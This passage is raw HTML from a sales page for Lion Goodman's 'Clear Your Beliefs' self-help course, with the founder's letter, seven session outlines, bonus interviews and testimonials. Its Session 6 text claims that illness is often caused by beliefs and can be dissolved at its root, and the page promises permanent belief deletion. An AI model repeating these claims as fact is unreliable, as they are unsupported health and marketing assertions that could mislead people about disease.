class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your 